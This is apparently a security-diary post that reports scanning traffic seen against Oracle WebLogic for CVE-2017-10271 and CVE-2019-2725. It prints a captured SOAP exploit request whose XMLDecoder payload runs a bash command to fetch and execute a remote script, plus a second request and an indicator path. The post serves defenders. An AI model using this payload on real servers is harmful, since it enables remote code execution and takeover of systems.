Scanning for Previous Oracle WebLogic Vulnerabilities

Published: 2021-10-09
Last Updated: 2021-10-09 22:29:40 UTC
by Guy Bruneau (Version: 1)
0 comment(s)

In the past few weeks, I have captured multiple instance of traffic related to some past Oracle vulnerabilities that have already been patched. The first is related to a RCE (CVE-2017-10271) that can be triggered to execute commands remotely by bypassing the CVE-2017-3506 patch's limitations. The POST contains an script which doesn't appear to be available for download.

The second example is a vulnerability in the Oracle WebLogic Server component related to a Deserialization Vulnerability (CVE-2019-2725).

Traffic Examples

20210929-120748: data
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: XX.XX.42.114:7001
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Content-Length: 611
Connection: close
Content-Type: text/xml
Accept-Encoding: gzip
<soapenv:Envelope xmlns:soapenv=""><soapenv:Header><work:WorkContext xmlns:work=""><java version="1.8.0_131" class="java.beans.XMLDecoder"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>cur -fsSL |sh</string> </void> </array> <void method="start"/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>

20211007-185800: data
POST /_async/AsyncResponseService HTTP/1.1
Content-type: text/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Content-Length: 1028
Cache-Control: no-cache
Pragma: no-cache
Host: XX.XX.42.114:7001

Indicators -> /wls-wsat/


Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

0 comment(s)


Diary Archives